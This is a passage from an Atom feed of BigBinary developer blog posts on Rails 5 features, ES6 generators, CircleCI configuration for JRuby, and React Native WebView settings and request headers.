   (0.1ms)  SELECT COUNT(*) AS &quot;size&quot;, MAX(&quot;posts&quot;.&quot;updated_at&quot;) AS timestamp FROM &quot;posts&quot;
Completed 304 Not Modified in 2ms (ActiveRecord: 0.3ms)</code></pre><p>The cache expires when the collection of records is updated. For example, the addition of a new record to the collection or a change in any of the records (which changes <code>updated_at</code>) would change the <code>ETag</code>.</p><p>Now that Rails 5 supports a collection of records in <code>fresh_when</code> and <code>stale?</code>, we have an improved system to cache resources and make our applications faster. This is especially helpful when we have controller actions with time-consuming data processing logic.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Set model name in fixtures as metadata]]></title>
       <author><name>Srihari K</name></author>
      <link href="https://www.bigbinary.com/blog/set-model-name-in-fixtures-as-metadata"/>
      <updated>2016-08-09T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/set-model-name-in-fixtures-as-metadata</id>
      <content type="html"><![CDATA[<h2>Fixtures</h2><p>In Rails, we use fixtures for setting up test data. Fixtures are written as YAML files placed in the <code>test/fixtures</code> directory in the Rails app.</p><p>The model name of a fixture is automatically picked up from the fixture file name.</p><p>Generally in Rails, the model name and table name follow a strict convention. The table for the <code>User</code> model will be <code>users</code>. By this convention, the fixture file for the <code>User</code> model is <code>test/fixtures/users.yml</code>.</p><p>But sometimes model names do not match directly with the table name. When we are building on top of a legacy application or we have namespacing of models, we might run into this scenario. In such cases, detection of the model name from the fixture file name becomes difficult.</p><p>When automatic detection of the model name from the fixture file name fails, we can specify the model class using the <a href="http://api.rubyonrails.org/classes/ActiveRecord/TestFixtures/ClassMethods.html#method-i-set_fixture_class">set_fixture_class</a> method. Take a look at our older <a href="tricks-and-tips-for-using-fixtures-in-rails">blog</a> for an example of how to do this.</p><p>One drawback of this approach is that the model name set using <code>set_fixture_class</code> is available only in the context of tests. When we run <code>rake db:fixtures:load</code> to load the fixtures, the tests are not run, and the fixture file is not associated with the model name we set using <code>set_fixture_class</code>. 
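For reference, that test-only mapping is typically declared in the test helper (a sketch, not runnable outside a Rails app; the table and model names follow the example below):

```ruby
# test/test_helper.rb -- visible only while the test suite runs,
# which is why `rake db:fixtures:load` cannot see this mapping
class ActiveSupport::TestCase
  set_fixture_class morning_appts: MorningAppointment
end
```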
This causes the fixtures to fail to load correctly.</p><h2>The Rails 5 way</h2><p>In Rails 5 a new key has been <a href="https://github.com/rails/rails/pull/20574">added</a> to specify the model name for a fixture file.</p><p>Let us consider the example where our table is named <code>morning_appts</code>, and we use a more appropriately named model <code>MorningAppointment</code> to represent this table.</p><p>We can now set the model name in our fixture file <code>test/fixtures/morning_appts.yml</code> as follows:</p><pre><code class="language-yaml">_fixture:
  model_class: MorningAppointment

standup:
  name: Standup
  priority: 1</code></pre><p>The special key <code>_fixture</code> in the fixture file is now used to store metadata about the fixture. <code>model_class</code> is the key we can use to specify the model name for the fixture.</p><p>We can now use this fixture to load test data using the rake task <code>rake db:fixtures:load</code> as well.</p><p>Happy Testing!</p>]]></content>
    </entry><entry>
       <title><![CDATA[Introduction to ES6 generators]]></title>
       <author><name>Arbaaz</name></author>
      <link href="https://www.bigbinary.com/blog/introduction-to-es6-generators"/>
      <updated>2016-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/introduction-to-es6-generators</id>
      <content type="html"><![CDATA[<p><strong>Generators</strong> in JavaScript are functions that can be <strong>paused</strong> and <strong>resumed</strong>.</p><pre><code class="language-javascript">function* genFunc(){...}</code></pre><p>Calling <code>genFunc()</code> <em>doesn't execute the body</em> of the function.</p><pre><code class="language-javascript">const genObj = genFunc();</code></pre><p>Instead, it returns a <strong>generator object</strong> which can be used to control the execution of the generator.</p><p><code>genObj.next()</code> will start executing the function, and it will execute <strong>till</strong> it reaches the <code>yield</code> keyword.</p><p>We can think of <code>yield</code> as <code>return for now</code>. It is similar to C# <a href="https://msdn.microsoft.com/en-us/library/9k7k7cf0.aspx">yield</a>.</p><pre><code class="language-javascript">function* genFunc() {
  console.log(&quot;First&quot;);
  yield;
  console.log(&quot;Second&quot;);
}

const genObj = genFunc();
genObj.next();

/* output
First
*/</code></pre><p>Calling <code>genObj.next()</code> again will <strong>resume</strong> execution after the yield.</p><pre><code class="language-javascript">function* genFunc() {
  console.log(&quot;First&quot;);
  yield;
  console.log(&quot;Second&quot;);
}

const genObj = genFunc();
genObj.next();
genObj.next();

/* output
First
Second
*/</code></pre><p>Here's what the execution looks like:</p><p><img src="/blog_images/2016/introduction-to-es6-generators/generator.gif" alt="Generator"></p><p><code>yield</code> is not allowed inside non-generator functions. 
That is, yielding in callbacks doesn't work.</p><p>We can also pass data to the generator function via <code>next</code>.</p><pre><code class="language-javascript">function* genFunc() {
  console.log(&quot;First&quot;);
  const input = yield;
  console.log(input);
  console.log(&quot;Second&quot;);
}

const genObj = genFunc();
genObj.next();
genObj.next(&quot;Third&quot;);

/* output
First
Third
Second
*/</code></pre><p>We can retrieve the yielded values via the generator object <code>genObj</code>:</p><pre><code class="language-javascript">function* genFunc() {
  console.log(&quot;First&quot;);
  const input = yield;
  console.log(input);
  console.log(&quot;Second&quot;);
  yield &quot;Fourth&quot;;
}

const genObj = genFunc();
genObj.next();
const result = genObj.next(&quot;Third&quot;);
console.log(result);

/* output
First
Third
Second
{
  done: false,
  value: &quot;Fourth&quot;
}
*/</code></pre><p>We can have multiple <code>yield</code> statements in the function, as shown in the above example.</p><p>Once the execution of the generator function is completed, further calls to <code>genObj.next()</code> will have <strong>no effect</strong>.</p><h3>Further reading</h3><p>We highly recommend <a href="http://exploringjs.com/es6/ch_generators.html">Exploring ES6</a> by Dr. Axel Rauschmayer to go deeper into this topic.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Configuring CircleCI for JRuby]]></title>
       <author><name>Ershad Kunnakkadan</name></author>
      <link href="https://www.bigbinary.com/blog/how-to-configure-circle-ci-for-jruby"/>
      <updated>2016-08-01T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/how-to-configure-circle-ci-for-jruby</id>
      <content type="html"><![CDATA[<p>Recently we worked with a client where we had to run a part of their multi-threaded code in JRuby for performance reasons. They have been using <a href="https://circleci.com">CircleCI</a> with MRI for running tests. In this post I will explain how we configured CircleCI to run the same tests using both JRuby and MRI.</p><p>CircleCI uses the <code>circle.yml</code> file for configuration. Before configuring JRuby, this is how it looked:</p><pre><code class="language-yaml">machine:
  ruby:
    version: 2.1.5

dependencies:
  pre:
    - ./bundle_install_circle_ci.sh
  cache_directories:
    - &quot;~/vendor/bundle&quot;

test:
  override:
    - ? bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app.xml
      : parallel: true
        pwd: app
        files:
          - spec/**/*_spec.rb</code></pre><p>Here are the steps to enable JRuby in CircleCI.</p><p><strong>Specify the JDK version</strong></p><p>We need to specify a JDK version before using JRuby.</p><pre><code class="language-yaml">machine:
  java:
    version: openjdk7</code></pre><p><strong>Install proper dependencies</strong></p><p>We needed to use JRuby 9.0.4.0, but the version of JRuby that came with the Ubuntu 12.04 image of CircleCI was different. We added the <code>rvm install</code> command as follows to install the specific version we wanted. We can also configure any script (like <code>bundle install</code>) that needs to run before running tests.</p><pre><code class="language-yaml">dependencies:
  pre:
    - rvm install jruby-9.0.4.0
    - ./bundle_install_jruby_circle_ci.sh
  cache_directories:
    - &quot;~/vendor/bundle&quot;</code></pre><p><strong>Configure JRuby</strong></p><p>We used <code>rvm-exec</code> to set JRuby for running the tests for this particular component in the <code>test</code> section. Otherwise it picks up MRI by default.</p><pre><code class="language-yaml">test:
  override:
    - ? rvm-exec jruby-9.0.4.0 bash -c &quot;bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app_jruby.xml&quot;
      : parallel: true
        pwd: app
        files:
          - spec/**/*_spec.rb</code></pre><p><strong>Improving test runs on JRuby</strong></p><p>Once we started running tests with JRuby, we observed that they were comparatively slow to finish. Most of the time was spent in starting the JVM. We made it faster by setting the <a href="https://github.com/jruby/jruby/wiki/Improving-startup-time#use-the---dev-flag"><code>--dev</code> parameter</a> in the <code>JRUBY_OPTS</code> environment variable. This parameter improves JRuby boot time, and it shaved more than a minute off for us.</p><pre><code class="language-yaml">machine:
  environment:
    JRUBY_OPTS: &quot;--dev&quot;</code></pre><p><strong>Here is the final circle.yml file:</strong></p><pre><code class="language-yaml"># circle.yml
machine:
  ruby:
    version: 2.1.5
  java:
    version: openjdk7
  environment:
    JRUBY_OPTS: &quot;--dev&quot;

dependencies:
  pre:
    - rvm install jruby-9.0.4.0
    - ./bundle_install_jruby_circle_ci.sh
  cache_directories:
    - &quot;~/vendor/bundle&quot;

test:
  override:
    - ? rvm-exec jruby-9.0.4.0 bash -c &quot;bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app_jruby.xml&quot;
      : parallel: true
        pwd: app
        files:
          - spec/**/*_spec.rb
    - ? bundle exec rspec --format progress --format documentation --format RspecJunitFormatter --out $CIRCLE_TEST_REPORTS/app_mri.xml
      : parallel: true
        pwd: app
        files:
          - spec/**/*_spec.rb</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[Opening non HTTPS sites in WebView in React Native]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/open-non-https-sites-in-webview-in-react-native"/>
      <updated>2016-07-27T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/open-non-https-sites-in-webview-in-react-native</id>
      <content type="html"><![CDATA[<p>Using WebView in a React Native application allows us to reuse already built web pages.</p><p>With iOS 9 or higher, if our application attempts to connect to any HTTP server that doesn't support the latest SSL technology <a href="http://en.wikipedia.org/wiki/Transport_Layer_Security#TLS_1.2">(TLSv1.2)</a>, WebView will fail and will not be able to load the web pages.</p><p>Let's see this in action. Here we are trying to access an HTTP site via WebView in React Native.</p><pre><code class="language-javascript">&lt;WebView style={styles.container} source={{ uri: &quot;http://del.icio.us&quot; }} /&gt;</code></pre><p>Running that on an iPhone simulator with iOS version 9.0 or greater would show the following error.</p><pre><code class="language-plaintext">Error Loading Page
Domain: NSURLErrorDomain
Error Code: -1022
Description: The resource could not be loaded because
the App Transport Security policy requires the use of a
secure connection</code></pre><p>Ideally, the site we are trying to connect to should have HTTPS enabled. However, there might be cases where we need to connect to sites where HTTPS is not enabled.</p><p>For example, while developing the app, we might want to connect to a local server which is running just HTTP.</p><h2>Fix - Using Xcode</h2><p>To access HTTP sites inside our WebView, we need to open the project in Xcode and open the <code>Info.plist</code> file.</p><p>In the list of keys, we will find <code>App Transport Security Settings</code>.</p><p>When we expand the section, we will find <code>localhost</code> inside the <code>Exception Domains</code> and the key <code>NSTemporaryExceptionAllowsInsecureHTTPLoads</code> with value <code>true</code>.</p><p>Because of this setting, when we are connecting to localhost the app runs even if the server is running on HTTP and not on HTTPS.</p><p><img src="/blog_images/2016/open-non-https-sites-in-webview-in-react-native/info-plist-before.png" alt="info plist before"></p><p>So in order to make our non-HTTPS site work, we need to add our website URL to this whitelist.</p><p>When we hover over the <code>Exception Domains</code> key, we will see a <code>+</code> sign on the right hand side.</p><p>Click on it and add our domain here. Set the type to <code>Dictionary</code>.</p><p>Now click on the domain we just entered and add <code>NSTemporaryExceptionAllowsInsecureHTTPLoads</code> with type <code>Boolean</code> and value <code>YES</code>, similar to the one present for <code>localhost</code>.</p><p><img src="/blog_images/2016/open-non-https-sites-in-webview-in-react-native/info-plist-after.png" alt="info plist after"></p><p>Re-run the app using <code>react-native run-ios</code> from the terminal, and now the site will be loaded.</p><p>If it doesn't work, then prior to running the app, do a clean build from Xcode.</p><h2>Fix using any IDE</h2><p>After making the changes from Xcode, if we look at the changes in the Info.plist file, we will find a few lines of code added.</p><p>So if we don't want to open Xcode for the fix, we can add the following lines directly to our Info.plist.</p><p>Edit the node for the key <code>NSAppTransportSecurity</code> so that the whole node now looks like this:</p><pre><code class="language-plist">&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;
&lt;dict&gt;
    &lt;key&gt;NSExceptionDomains&lt;/key&gt;
    &lt;dict&gt;
        &lt;key&gt;del.icio.us&lt;/key&gt;
        &lt;dict&gt;
            &lt;key&gt;NSTemporaryExceptionAllowsInsecureHTTPLoads&lt;/key&gt;
            &lt;true/&gt;
        &lt;/dict&gt;
        &lt;key&gt;localhost&lt;/key&gt;
        &lt;dict&gt;
            &lt;key&gt;NSTemporaryExceptionAllowsInsecureHTTPLoads&lt;/key&gt;
            &lt;true/&gt;
        &lt;/dict&gt;
    &lt;/dict&gt;
&lt;/dict&gt;</code></pre><p>Be sure to re-run the app using <code>react-native run-ios</code>. Now let's see how to allow all HTTP sites instead of whitelisting each one.</p><h4>Using Xcode</h4><p>To allow all non-HTTPS sites, just delete the <code>Exception Domains</code> key from Info.plist in Xcode and add a new key <code>Allow Arbitrary Loads</code> with the value <code>true</code>.</p><h4>Using any IDE</h4><p>Our <code>NSAppTransportSecurity</code> node should just contain the following.</p><pre><code class="language-plist">&lt;key&gt;NSAppTransportSecurity&lt;/key&gt;
&lt;dict&gt;
    &lt;key&gt;NSAllowsArbitraryLoads&lt;/key&gt;
    &lt;true/&gt;
&lt;/dict&gt;</code></pre>]]></content>
    </entry><entry>
       <title><![CDATA[HTTP request headers on each WebView request]]></title>
       <author><name>Chirag Shah</name></author>
      <link href="https://www.bigbinary.com/blog/passing-request-headers-on-each-webview-request-in-react-native"/>
      <updated>2016-07-26T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/passing-request-headers-on-each-webview-request-in-react-native</id>
      <content type="html"><![CDATA[<p>Using <a href="https://facebook.github.io/react-native/docs/webview.html">WebView</a> in a React Native application allows us to reuse already built web pages.</p><p>HTTP headers are name/value pairs that appear in both request and response messages. The purpose of headers is to supply the web server with additional information and control how content is returned.</p><p>In React Native, while opening web pages via the WebView component, we can pass headers to the HTTP request. Refer to our <a href="passing-user-agent-or-custom-header-in-react-native-webview">previous blog</a> for more on this.</p><pre><code class="language-javascript">&lt;WebView
  source={{
    uri: &quot;http://localhost:3000&quot;,
    headers: { &quot;custom-app-header&quot;: &quot;react-native-ios-app&quot; },
  }}
/&gt;</code></pre><p>But there is a bug. On subsequent requests from inside the WebView, the headers are not passed in the request.</p><p>First, let's try to understand by recreating the bug. We have created a simple Node server which will act as the backend for the application and log the request along with the custom header.</p><p>Here is our <code>server.js</code>:</p><pre><code class="language-javascript">var http = require(&quot;http&quot;);
var port = 3000;

function logRequest(request) {
  console.log(&quot;Processing request for: &quot;, request.url);
  console.log(&quot;Custom Header: &quot;, request.headers[&quot;custom-app-header&quot;]);
  console.log(&quot;Request Processed\n&quot;);
}

http
  .createServer(function (request, response) {
    response.writeHead(200, { &quot;Content-Type&quot;: &quot;text/html&quot; });
    switch (request.url) {
      case &quot;/&quot;:
        response.write(
          &quot;&lt;html&gt;&lt;body&gt;Welcome&lt;a href='/bye'&gt;Bye&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;&quot;
        );
        logRequest(request);
        break;
      case &quot;/bye&quot;:
        response.write(&quot;&lt;html&gt;&lt;body&gt;Bye&lt;a href='/'&gt;Welcome&lt;/a&gt;&lt;/body&gt;&lt;/html&gt;&quot;);
        logRequest(request);
        break;
      default:
        break;
    }
    response.end();
  })
  .listen(port);</code></pre><p>As we can see, the <code>welcome</code> page has a link to <code>bye</code> and vice versa. Let's start the Node server by running <code>node server.js</code>.</p><p>When we run the app on the simulator, the <code>welcome</code> page opens up, and in the server log we can verify that the request header is being passed.</p><pre><code class="language-plaintext">Processing request for:  /
Custom Header:  react-native-ios-app
Request Processed</code></pre><p>But when we click on the <code>Bye</code> link from the <code>Welcome</code> page, the server doesn't receive the request header, which can be verified from the log.</p><pre><code class="language-plaintext">Processing request for:  /bye
Custom Header:  undefined
Request Processed</code></pre><p>And it can be verified again that for any subsequent clicks the request header does not get passed. We can click on <code>Welcome</code> and check the log again.</p><pre><code class="language-plaintext">Processing request for:  /
Custom Header:  undefined
Request Processed</code></pre><p>We recently encountered this bug and created an issue <a href="https://github.com/facebook/react-native/issues/8693">here</a>. Until the issue is fixed, we have found a workaround.</p><h2>Workaround</h2><p>WebView provides a prop <code>onLoadStart</code> which accepts a function that is invoked when the WebView starts loading.</p><p>We can use this prop to know when a link is clicked and then re-render the WebView component with the new URL. Re-rendering the WebView component will load the page as if it's the first page, and then the request headers will be passed.</p><p>We know that in React, a component re-renders itself when any of its state changes. The only thing which changes here is the URL, so let's move the URL into state and initialize it to the <code>Welcome</code> page, which is the root of the application. Then use the <code>onLoadStart</code> prop to change the URL state to the clicked URL.</p><p>Here's the new code.</p><pre><code class="language-javascript">class testApp extends Component {
  state = {
    url: &quot;http://localhost:3000&quot;,
  };

  render() {
    return (
      &lt;WebView
        onLoadStart={(navState) =&gt;
          this.setState({ url: navState.nativeEvent.url })
        }
        source={{
          uri: this.state.url,
          headers: { &quot;custom-app-header&quot;: &quot;react-native-ios-app&quot; },
        }}
      /&gt;
    );
  }
}</code></pre><p>Now when we run the app, we can verify in the backend that the request headers are being sent even when we click on the <code>Bye</code> link.</p><pre><code class="language-plaintext">Processing request for:  /bye
Custom Header:  undefined
Request Processed

Processing request for:  /bye
Custom Header:  react-native-ios-app
Request Processed</code></pre><p>One thing to note here is that when we click on the <code>Bye</code> link, the request is not intercepted from reaching the server. We are just resending the request by means of a component re-render with the new URL.</p><p>Hence in the log we see two requests. The first request took place when the user clicked on the link, and the second request occurred when the component got re-rendered with the required request headers.</p><p>This workaround might help us pass the request headers which we intend to send to the backend server until the issue gets fixed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[ActionController::Parameters in Rails 5]]></title>
       <author><name>Rohit Arolkar</name></author>
      <link href="https://www.bigbinary.com/blog/parameters-no-longer-inherit-from-hash-with-indifferent-access-in-rails-5"/>
      <updated>2016-07-25T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/parameters-no-longer-inherit-from-hash-with-indifferent-access-in-rails-5</id>
      <content type="html"><![CDATA[<p>We are all guilty of treating <code>ActionController::Parameters</code> as a plain hash atsome point or the other. But with Rails 5, <code>ActionController::Parameters</code> willno longer inherit from <code>HashWithIndifferentAccess</code>.</p><p>Inheriting from <code>HashWithIndifferentAccess</code> allowed programmers to callenumerable methods over <code>ActionController::Parameters</code>, which caused<code>ActionController::Parameters</code> to lose its <code>@permitted</code> state there by renderingStrong Parameters as a barebone Hash. This<a href="https://github.com/rails/rails/pull/20868/commits/14a3bd520dd4bbf1247fd3e0071b59c02c115ce0">change</a>would discourage such operations.</p><p>However since this change would have meant a major impact on all of theupgrading applications as they would have crashed with a <code>NoMethodError</code>for allof those undesired methods. Hence this feature would go through a deprecationcycle, showing deprecation warnings for all of those <code>HashWithIndifferentAccess</code>method usages.</p><pre><code class="language-ruby">class Parameters...def method_missing(method_sym, *args, &amp;block)  if @parameters.respond_to?(method_sym)    message = &lt;&lt;-DEPRECATE.squish      Method #{method_sym} is deprecated and will be removed in Rails 5.1,      as `ActionController::Parameters` no longer inherits from      hash. Using this deprecated behavior exposes potential security      problems. If you continue to use this method you may be creating      a security vulnerability in your app that can be exploited. 
Instead,      consider using one of these documented methods which are not      deprecated: http://api.rubyonrails.org/v#{ActionPack.version}/classes/ActionController/Parameters.html    DEPRECATE    ActiveSupport::Deprecation.warn(message)    @parameters.public_send(method_sym, *args, &amp;block)  else    super  endend...end</code></pre><p>If you need to convert <code>ActionController::Parameters</code> in a true hash then itsupports <code>to_h</code> method. Also <code>ActionController::Parameters</code> will continue tohave methods like <code>fetch, slice, slice!, except, except!, extract!, delete</code> etc.You can take a detailed look at them<a href="https://github.com/rails/rails/blob/1a2f1c48bdeda5df88e8031fe51943527ebc381e/actionpack/lib/action_controller/metal/strong_parameters.rb">here</a>.</p>]]></content>
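<![CDATA[
The shim above depends on Rails internals, but the pattern is plain Ruby. Here is a minimal, Rails-free sketch of the same idea: a Parameters-like wrapper that forwards unknown methods to the underlying hash while recording a deprecation warning. The class name and the `warnings` accessor are hypothetical, for illustration only.

```ruby
# A Rails-free sketch of the deprecation shim: unknown methods are forwarded
# to the wrapped hash, and each forwarded call records a warning.
class SketchParameters
  attr_reader :warnings

  def initialize(parameters)
    @parameters = parameters
    @warnings = []
  end

  # Explicit conversion to a plain hash, as Rails 5 recommends via #to_h.
  def to_h
    @parameters.dup
  end

  private

  # Forward deprecated hash methods, warning on each call.
  def method_missing(method_sym, *args, &block)
    if @parameters.respond_to?(method_sym)
      @warnings.push("Method #{method_sym} is deprecated")
      @parameters.public_send(method_sym, *args, &block)
    else
      super
    end
  end

  def respond_to_missing?(method_sym, include_private = false)
    @parameters.respond_to?(method_sym) || super
  end
end
```

Calling `SketchParameters.new({"name" => "Ruby"}).keys` still works, but records a warning, mirroring how Rails 5 nudges you toward `to_h` and the documented API.
]]>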
    </entry><entry>
       <title><![CDATA[Rails 5 solves ambiguous column issue]]></title>
       <author><name>Abhishek Jain</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-fixes-ambiguous-cloumn-name-for-projected-fields-in-group-by-query"/>
      <updated>2016-07-21T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-fixes-ambiguous-cloumn-name-for-projected-fields-in-group-by-query</id>
      <content type="html"><![CDATA[<pre><code class="language-ruby">users(:id, :name)posts(:id, :title, :user_id)comments(:id, :description, :user_id, :post_id)&gt;&gt; Post.joins(:comments).group(:user_id).countMysql2::Error: Column 'user_id' in field list is ambiguous: SELECT COUNT(*) AS count_all, user_id AS user_id FROM `posts` INNER JOIN `comments` ON `comments`.`post_id` = `posts`.`id` GROUP BY user_id</code></pre><p>As we can see <code>user_id</code> has conflict in both <code>projection</code> and <code>GROUP BY</code> as theyare not prepended with the table name <code>posts</code> in the generated SQL and thus,raising SQL error <code>Column 'user_id' in field list is ambiguous</code>.</p><h2>Fix in Rails 5</h2><p>This issue has been addressed in Rails 5 with<a href="https://github.com/rails/rails/pull/21950">this pull request</a>.</p><p>With this fix, we can now <code>group by</code> columns having same name in both thetables.</p><pre><code class="language-ruby">users(:id, :name)posts(:id, :title, :user_id)comments(:id, :description, :user_id, :post_id)&gt;&gt; Post.joins(:comments).group(:user_id).countSELECT COUNT(*) AS count_all, &quot;posts&quot;.&quot;user_id&quot; AS posts_user_id FROM &quot;posts&quot; INNER JOIN &quot;comments&quot; ON &quot;comments&quot;.&quot;post_id&quot; = &quot;posts&quot;.&quot;id&quot; GROUP BY &quot;posts&quot;.&quot;user_id&quot;=&gt; { 1 =&gt; 1 }</code></pre><p>This shows that now both <code>projection</code> and <code>Group By</code> are prepended with the<code>posts</code> table name and hence fixing the conflict.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Expression Indexes & Operator Classes support]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-adds-support-for-expression-indexes-for-postgresql"/>
      <updated>2016-07-20T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-adds-support-for-expression-indexes-for-postgresql</id>
      <content type="html"><![CDATA[<p>Let's assume that in our health care application we have a page which shows allPatients. This page also has a filter and it allows us to filter patients bytheir name.</p><p>We could implement the filter as shown here.</p><pre><code class="language-ruby">Patient.where(&quot;lower(first_name) = ?&quot;, first_name.downcase)</code></pre><p>There might be many users with the same name. In such cases, to speed up thesearch process, we can add an index. But, adding a regular index will nottrigger an index scan since we are using an expression in the where clause i.e<code>lower(name)</code>. In such cases, we can leverage<a href="https://www.postgresql.org/docs/8.1/static/indexes-expressional.html">expression indexes given by PostgreSQL</a>.</p><p>Before Rails 5 adding an expression index is not straightforward since themigrate api does not support it. In order to add one we would need to ditch<code>schema.rb</code> and start using <code>structure.sql</code>. We would also need to add followingmigration.</p><pre><code class="language-ruby">def upexecute &lt;&lt;-SQLCREATE INDEX patient_lower_name_idx ON patients (lower(name));SQLenddef downexecute &lt;&lt;-SQLDROP INDEX patient_lower_name_idx;SQLend</code></pre><h2>Rails 5 adds support for expression indexes</h2><p>Rails 5 provides<a href="https://github.com/rails/rails/commit/edc2b7718725016e988089b5fb6d6fb9d6e16882">ability to add an expression index using add_index method</a>as follows:</p><pre><code class="language-ruby">def changeadd_index :patients,'lower(last_name)',name: &quot;index_patients_on_name_unique&quot;,unique: trueend</code></pre><p>And we also get to keep schema.rb.</p><p>Time goes on. 
everyone is happy with the search functionality until one day anew requirement comes along which is, in short, to have partial matches onpatient names.</p><p>We modify our search as follows:</p><pre><code class="language-ruby">User.where(&quot;lower(name) like ?&quot;, &quot;%#{name.downcase}%&quot;)</code></pre><p>Since the query is different from before, PostgreSQL query planner will not takethe already existing btree index into account and will revert to a sequentialscan.</p><p>Quoting directly from Postgresql documents,</p><pre><code class="language-plaintext">'The operator classes text_pattern_ops, varchar_pattern_ops, and bpchar_pattern_ops support B-tree indexes on the types text, varchar, and char respectively. The difference from the default operator classes is that the values are compared strictly character by character rather than according to the locale-specific collation rules. This makes these operator classes suitable for use by queries involving pattern matching expressions (LIKE or POSIX regular expressions) when the database does not use the standard &quot;C&quot; locale.'</code></pre><p>We need to add an operator class to the previous index for the query planner toutilize the index that we created earlier.</p><h2>Rails 5 adds support for specifying operator classes on expression indexes</h2><p>In order to add an index with an operator class we could write our migration asshown below.</p><pre><code class="language-ruby">def changeremove_index :patients, name: :index_patients_on_name_uniqueadd_index :patients, 'lower(last_name) varchar_pattern_ops',name: &quot;index_patients_on_name_unique&quot;,unique: trueend</code></pre>]]></content>
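<![CDATA[
To make the mapping from migration to database concrete, here is a hypothetical sketch of the DDL such an `add_index` call boils down to. This is not Rails' actual SQL builder; it is a plain-Ruby illustration of the statement PostgreSQL would roughly receive.

```ruby
# Hypothetical sketch: render the CREATE INDEX statement for an expression
# index (optionally unique), mirroring the migration above.
def create_index_sql(table, expression, name:, unique: false)
  kind = unique ? "CREATE UNIQUE INDEX" : "CREATE INDEX"
  "#{kind} #{name} ON #{table} (#{expression})"
end
```

For the operator-class migration above, `create_index_sql("patients", "lower(last_name) varchar_pattern_ops", name: "index_patients_on_name_unique", unique: true)` renders the `CREATE UNIQUE INDEX` statement with the operator class inline in the indexed expression.
]]>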
    </entry><entry>
       <title><![CDATA[Attach arbitrary metadata to an Active Job in Rails 5]]></title>
       <author><name>Midhun Krishna</name></author>
      <link href="https://www.bigbinary.com/blog/attach-arbitrary-metadata-to-an-active-job-in-rails-5"/>
      <updated>2016-07-18T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/attach-arbitrary-metadata-to-an-active-job-in-rails-5</id>
      <content type="html"><![CDATA[<p>Rails 4.2 came with built-in support for executing jobs in the background usingActive Job. Along with many enhancements to Active Job, Rails 5 provides theability to<a href="https://github.com/rails/rails/pull/18260">attach arbitrary metadata to any job</a>.</p><p>Consider the scenario where we would like to get notified when a job has failedfor more than three times. With the new enhancement, we can make it work byoverriding <code>serialize</code> and <code>deserialize</code> methods of the job class.</p><pre><code class="language-ruby">class DeliverWebhookJob &lt; ActiveJob::Base  def serialize    super.merge('attempt_number' =&gt; (@attempt_number || 0) + 1)  end  def deserialize(job_data)    super(job_data)    @attempt_number = job_data['attempt_number']  end  rescue_from(TimeoutError) do |ex|    notify_job_tried_x_times(@attempt_number) if @attempt_number == 3    retry_job(wait: 10)  endend</code></pre><p>Earlier, deserialization was performed by #deserialize class method andtherefore was inaccessible from the job instance. With the new changes,deserialization is delegated to the deserialize method on job instance therebyallowing it to attach arbitrary metadata when it gets serialized and read itback when it gets performed.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Partial template name without Ruby identifier Rails 5]]></title>
       <author><name>Prajakta Tambe</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-partial-template-name-need-not-be-a-valid-ruby-identifier"/>
      <updated>2016-07-14T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-partial-template-name-need-not-be-a-valid-ruby-identifier</id>
      <content type="html"><![CDATA[<p>Before Rails 5, partials name should start with underscore and should befollowed by any combination of letters, numbers and underscores.</p><p>This rule was required because before<a href="https://github.com/rails/rails/commit/c67005f221f102fe2caca231027d9b11cf630484">commit</a>,rendering a partial without giving <code>:object</code> or <code>:collection</code> used to generate alocal variable with the partial name by default and a variable name in rubycan't have dash and other things like that.</p><p>In the following case we have a file named <code>_order-details.html.erb</code>. Now let'stry to use this partial.</p><pre><code class="language-ruby">&lt;!DOCTYPE html&gt;&lt;html&gt;&lt;body&gt;  &lt;%= render :partial =&gt; 'order-details' %&gt;&lt;/body&gt;&lt;/html&gt;</code></pre><p>We will get following error, if we try to render above view in Rails 4.x.</p><pre><code class="language-ruby">ActionView::Template::Error (The partial name (order-details) is not a valid Ruby identifier;make sure your partial name starts with underscore,and is followed by any combination of letters, numbers and underscores.):2: &lt;html&gt;3: &lt;body&gt;4: Following code is rendered through partial named \_order-details.erb5: &lt;%= render :partial =&gt; 'order-details' %&gt;6: &lt;/body&gt;7: &lt;/html&gt;</code></pre><p>In the above the code failed because the partial name has a dash which is not avalid ruby variable name.</p><p>In Rails 5, we can give our<a href="https://github.com/rails/rails/commit/da9038e">partials any name which starts with underscore</a>.</p>]]></content>
    </entry><entry>
       <title><![CDATA[Rails 5 Passing current record for custom error]]></title>
       <author><name>Hitesh Rawal</name></author>
      <link href="https://www.bigbinary.com/blog/rails-5-allows-passing-record-to-error-message-generator"/>
      <updated>2016-07-13T12:00:00+00:00</updated>
      <id>https://www.bigbinary.com/blog/rails-5-allows-passing-record-to-error-message-generator</id>
